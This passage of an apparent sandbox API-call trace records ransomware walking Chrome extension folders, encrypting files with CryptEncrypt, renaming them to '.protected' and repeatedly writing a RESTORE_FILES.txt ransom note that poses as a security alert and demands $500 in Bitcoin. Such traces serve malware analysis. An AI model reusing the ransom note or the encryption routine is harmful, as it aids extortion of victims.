Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.343] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.343] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.344] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.345] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.345] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.345] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.345] CloseHandle (hObject=0x164) returned 1 [0081.345] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0081.345] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0081.345] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg") returned 141 [0081.345] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0081.345] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0081.345] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*") returned 143 [0081.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.346] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.346] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.346] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.346] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.346] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\.") returned 143 [0081.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.346] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.346] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.346] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\..") returned 144 [0081.346] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.346] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.346] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.347] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.347] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.347] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.347] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.347] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x124, lpOverlapped=0x0) returned 1 [0081.348] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.349] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x124, lpOverlapped=0x0) returned 1 [0081.349] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.349] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.349] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.349] CloseHandle (hObject=0x168) returned 1 [0081.349] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.protected") returned 165 [0081.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.protected")) returned 1 [0081.350] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.350] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.350] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0081.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.351] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.351] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.352] lstrlenA (lpString="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") returned 684 [0081.352] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.352] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.352] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.352] CloseHandle (hObject=0x164) returned 1 [0081.352] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0081.352] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca") returned 141 [0081.352] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0081.352] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0081.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*") returned 143 [0081.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.353] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.353] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.353] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.353] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\.") returned 143 [0081.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.354] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.354] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.354] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.354] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.354] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\..") returned 144 [0081.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") 
returned 155 [0081.354] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.354] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.356] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.356] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.356] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.356] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0081.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.357] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0081.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.357] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.358] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.358] CloseHandle (hObject=0x168) returned 1 [0081.358] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.protected") returned 165 [0081.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.protected")) returned 1 [0081.359] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.359] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.359] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0081.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.359] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.359] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 